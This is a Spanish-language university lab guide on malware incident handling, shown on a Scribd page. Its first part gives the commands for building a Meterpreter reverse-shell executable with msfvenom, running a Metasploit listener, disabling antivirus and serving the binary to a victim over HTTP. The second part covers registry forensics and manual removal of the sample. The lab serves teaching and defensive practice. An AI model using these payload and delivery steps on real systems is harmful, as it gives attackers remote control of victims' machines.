Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Laboratorio Malware - Gestión de Malware 1

    Cargado por

    Cristian González
    5 vistas12 páginas

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    5 vistas12 páginas

    Laboratorio Malware - Gestión de Malware 1

    Cargado por

    Cristian González

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 12

    Laboratorio Malware - Gestión de Malware

    Objetivos

    • Recrear técnicas de creación de payloads mediante binarios

    • Familiarizarse con el concepto de reverse-shell

    • Interactuar con el registro de windows

    • Replicar el proceso de eliminacion manual de una muestra de malware por


    medio del registro de windows.

    Preparación del laboratorio

    El presente escenario es aplicable en aquellos activos que poseen dispositivos de


    seguridad que impiden el reconocimiento de puertos y servicios en ejecución por lo
    tanto, se se utilizará el concepto de reverse-shell
    Pasos del laboratorio

    Parte 1 - Generación de Incidente


    1. Generación del binario malicioso

    Para este ataque construiremos un payload mediante un binario que será entregado
    a la víctima. Al ejecutarse el binario se generará una conexión reversa.

    Nota

    Para el presente laboratorio se creará una muestra de malware fácilmente


    detectable por soluciones antimalware. Por lo tanto se recomienda deshabilitar las
    soluciones antivirus para la correcta ejecución de la muestra y prueba de
    concepto. La generación de muestras de malware indetectables por sistemas
    antimalware se encuentra fuera del alcance de la asignatura de Gestión de
    Incidentes de Seguridad informática.

    La muestra será construida mediante el payload windows/meterpreter/reverse_tcp

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=[direccion_IP] LPORT=4444 -f exe >


    muestra.exe

    Para iniciar Metasploit ejecute el comando

    msfconsole
    Como siguiente punto es necesario iniciar un listener en metasploit, el cual recibirá
    las conexiones en reversa y seleccionar el mismo payload que fue utilizado para
    crear la muestra, mediante el siguiente comando:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp

    Configuramos la direccion IP del LHOST mediante


    set LHOST direccion_IP

    Ejecutamos el listener mediante el comando

    exploit -j

    2. Entrega de la muestra

    Para la entrega de la muestra en la máquina de la victima podemos levantar un


    servidor HTTP temporal en nuestra maquina de Kali Linux, la victima visitará esta
    página, descargará el binario y una vez que lo ejecute se generará la conexión
    reversa con el atacante.

    python -m SimpleHTTPServer 80
    El comando exploit -j iniciará un socket de conexiones en reversa. Cuando una
    víctima ejecute la muestra en su computador se generará una conexión reversa.

    Parte 2 - Gestión del Incidente


    Una vez que se ha recreado el proceso de infección se analizará el primer
    procedimiento para la gestión del incidente procediendo con la identificación y
    posterior desinfección mediante el uso del registro de windows
    1. Registro de Windows GUI

    2. Registro de Windows CLI (ejemplos)

    Identificación de la arquitectura

    reg query HKLM\Hardware\Description\System\CentralProcessor\0

    Configuración de las interfaces de red

    reg query HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces


    Consulta de los subárboles de registro

    reg query HKLM\System\CurrentControlSet\Control\hivelist

    Consulta de secuencia de inicio de sesión Winlogon

    reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon


    Consulta de programas instalados

    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall

    Consulta de las políticas de firewall

    reg query HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy


    Consulta de las aplicaciones que se ejecutan en el arranque del sistema operativo
    mediante el registro de windows CLI

    reg query hklm\software\Microsoft\Windows\currentversion\run

    3. Eliminación manual de una muestra simulada mediante el


    registro de windows

    Abrir el editor de registro de windows

    regedit.exe

    Navegar hasta la llave


    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
    Crear un nuevo valor de tipo DWORD (32-bit) y llamarlo AllowProtectedRenames

    Establecer el campo información del valor en 1

    Crear un nuevo valor de tipo Multi-String y llamarlo


    PendingFileRenameOperations

    Establecer el campo información del valor de acuerdo al full path del archivo a
    eliminar
    \??\C:\muestra.exe

    Editar el valor binario con ceros hasta completar la estructura del valor binario
    Cerrar el regitro de windows y reiniciar la pc mediante

    shutdown /r /t 0

    Nota

    Si al reiniciar la pc el archivo muestra.exe no ha sido eliminado repetir la


    creación de los valores de registro teniendo especial énfasis en los nombres de los
    campos así como en la edición del binario.

    También podría gustarte